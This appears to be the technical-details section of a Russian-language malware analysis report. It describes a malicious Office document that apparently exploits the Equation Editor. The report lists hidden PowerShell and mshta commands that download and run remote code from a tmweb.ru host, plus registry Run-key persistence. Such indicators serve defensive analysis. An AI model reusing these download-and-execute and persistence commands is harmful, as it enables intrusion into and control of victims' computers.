Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'TQURHX' = 'powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cn23428.tmweb...
- '%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/av17.hta
- http://cn####8.tmweb.ru/av17.hta
- DNS ASK cn####8.tmweb.ru
- '%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/av17.hta (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v TQURHX /t REG_SZ /d "powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://c...' (со скрытым окном)
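- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding (редактор формул Microsoft Office, запущенный как OLE-сервер; в сочетании с запуском cmd.exe и mshta.exe из этого же отчёта это, вероятно, указывает на эксплуатацию уязвимости редактора формул)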
- '%WINDIR%\syswow64\mshta.exe' http://cn####8.tmweb.ru/av17.hta
- '%WINDIR%\syswow64\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v TQURHX /t REG_SZ /d "powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://c...